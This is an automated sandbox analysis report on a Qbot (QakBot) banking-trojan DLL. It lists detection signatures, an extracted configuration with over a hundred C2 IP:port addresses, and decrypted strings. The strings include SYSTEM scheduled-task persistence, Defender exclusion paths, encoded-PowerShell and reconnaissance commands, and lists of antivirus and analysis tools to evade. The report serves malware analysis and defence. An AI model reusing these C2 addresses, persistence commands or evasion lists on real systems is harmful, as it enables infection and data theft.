Windows Analysis Report
A290.dll

Overview

General Information

Sample Name: A290.dll
Analysis ID: 878697
MD5: 061a8b23a85b75400cd719fd173767c3
SHA1: 05a7ee8edfb504be3cb6c4e5230fc3994586bf1e
SHA256: 6615dda3718170a2c4946ebf0a62ad4f36b707c1d984011f866ff56dd2c3cc24
Tags: dllqbot
Infos:

Detection

Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Antivirus / Scanner detection for submitted sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Potentially malicious time measurement code found
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Name Description Attribution Blogpost URLs Link
QakBot, qbotQbot QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • GOLD CABIN
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

AV Detection

barindex
Source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": ["12.172.173.82:50001", "178.175.187.254:443", "65.95.141.84:2222", "205.237.67.69:995", "83.110.223.61:443", "193.253.100.236:2222", "27.0.48.233:443", "102.159.188.125:443", "71.38.155.217:443", "58.186.75.42:443", "76.178.148.107:2222", "70.28.50.223:2087", "114.143.176.236:443", "51.14.29.227:2222", "59.28.84.65:443", "173.88.135.179:443", "103.144.201.56:2078", "96.87.28.170:2222", "105.186.128.181:995", "176.142.207.63:443", "151.62.238.176:443", "12.172.173.82:32101", "122.186.210.254:443", "82.125.44.236:2222", "84.108.200.161:443", "76.16.49.134:443", "70.28.50.223:32100", "12.172.173.82:465", "76.170.252.153:995", "184.182.66.109:443", "78.92.133.215:443", "50.68.204.71:993", "186.75.95.6:443", "113.11.92.30:443", "70.28.50.223:3389", "98.145.23.67:443", "85.57.212.13:3389", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "69.242.31.249:443", "81.101.185.146:443", "79.168.224.165:2222", "75.143.236.149:443", "14.192.241.76:995", "86.195.14.72:2222", "81.229.117.95:2222", "220.240.164.182:443", "73.29.92.128:443", "12.172.173.82:21", "96.56.197.26:2222", "75.109.111.89:443", "76.86.31.59:443", "201.244.108.183:995", "68.203.69.96:443", "124.122.47.148:443", "122.184.143.86:443", "92.186.69.229:2222", "70.28.50.223:2083", "89.129.109.27:2222", "147.147.30.126:2222", "125.99.76.102:443", "88.126.94.4:50000", "151.65.167.77:443", "86.132.236.117:443", "92.154.17.149:2222", "223.166.13.95:995", "89.36.206.69:995", "96.56.197.26:2083", "78.18.105.11:443", "82.127.153.75:2222", "90.78.147.141:2222", "82.131.141.209:443", "183.87.163.165:443", "92.9.45.20:2222", "80.6.50.34:443", "80.12.88.148:2222", "69.133.162.35:443", "172.115.17.50:443", "95.45.50.93:2222", "12.172.173.82:2087", "103.140.174.20:2222", "24.198.114.130:995", "50.68.204.71:443", "69.119.123.159:2222", "64.121.161.102:443", "2.82.8.80:443", "184.181.75.148:443", "70.112.206.5:443", "198.2.51.242:993", "2.36.64.159:2078", "79.77.142.22:2222", "84.215.202.8:443", "147.219.4.194:443", "116.74.164.81:443", "70.28.50.223:2078", "12.172.173.82:995", "77.86.98.236:443", "104.35.24.154:443", "213.64.33.61:2222", "47.149.134.231:443", "72.134.124.16:443", "47.34.30.133:443", "103.42.86.42:995", "174.4.89.3:443", "161.142.103.187:995", "78.160.146.127:443", "84.35.26.14:995", "12.172.173.82:20", "70.28.50.223:2078", "124.149.143.189:2222", "70.160.67.203:443", "186.64.67.30:443", "103.123.223.133:443", "188.28.19.84:443", "174.58.146.57:443", "94.207.104.225:443", "86.97.55.89:2222", "69.123.4.221:2222"]}
Source: A290.dll Avira: detected
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: netstat -nao
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: runas
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ipconfig /all
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net localgroup
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: nltest /domain_trusts /all_trusts
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Microsoft
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELF_TEST_1
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: p%08x
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self test FAILED!!!
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self test OK.
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: /t5
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: whoami /all
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: route print
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .lnk
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: arp -a
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net share
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd.exe /c set
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self check
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %u;%u;%u;
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ProfileImagePath
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: at.exe %u:%u "%s" /I
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ProgramData
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self check ok!
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: qwinsta
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net view
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Component_08
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Start screenshot
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: schtasks.exe /Delete /F /TN %u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: appidapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\ProgramData
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Component_07
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe -encodedCommand %S
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe -encodedCommand
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: netstat -nao
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: runas
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ipconfig /all
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SystemRoot
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cscript.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/jpeg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LocalLow
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: displayName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shlwapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CommandLine
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernel32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: 1234567890
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wbj.go
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_DiskDrive
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: System32
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Name
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WRSA.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SpyNetReporting
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: FALSE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aswhookx.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Packages
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: application/x-shockwave-flash
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: RepUx.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Winsta0
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: avp.exe;kavtray.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: root\SecurityCenter2
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: MsMpEng.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: userenv.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: csc_ui.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \\.\pipe\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: pstorec.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: NTUSER.DAT
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: from
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\sethc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: netapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: gdi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: setupapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM Win32_Processor
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: iphlpapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CrAmTray.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_ComputerSystem
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: user32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \sf2.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: egui.exe;ekrn.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Software\Microsoft
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %S.%06d
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bcrypt.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM AntiVirusProduct
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wtsapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shell32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: TRUE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Bios
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: */*
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ByteFence.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: type=0x%04X
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ROOT\CIMV2
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: https
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: fshoster32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernelbase.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: regsvr32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s\system32\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Process
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: rundll32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LOCALAPPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: APPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: select
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: mcshield.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: advapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ws2_32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .cfg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Product
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WQL
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wininet.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LastBootUpTime
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: urlmon.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Create
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PnPEntity
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Initializing database...
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: winsta0\default
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dat
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WBJ_IGNORE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: next
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wpcap.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/pjpeg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: fmon.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: vbs
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aswhooka.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SysWOW64
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: mpr.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/gif
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: crypt32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ntdll.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: open
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SystemRoot
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cscript.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/jpeg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LocalLow
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: displayName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shlwapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CommandLine
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernel32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: 1234567890
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wbj.go
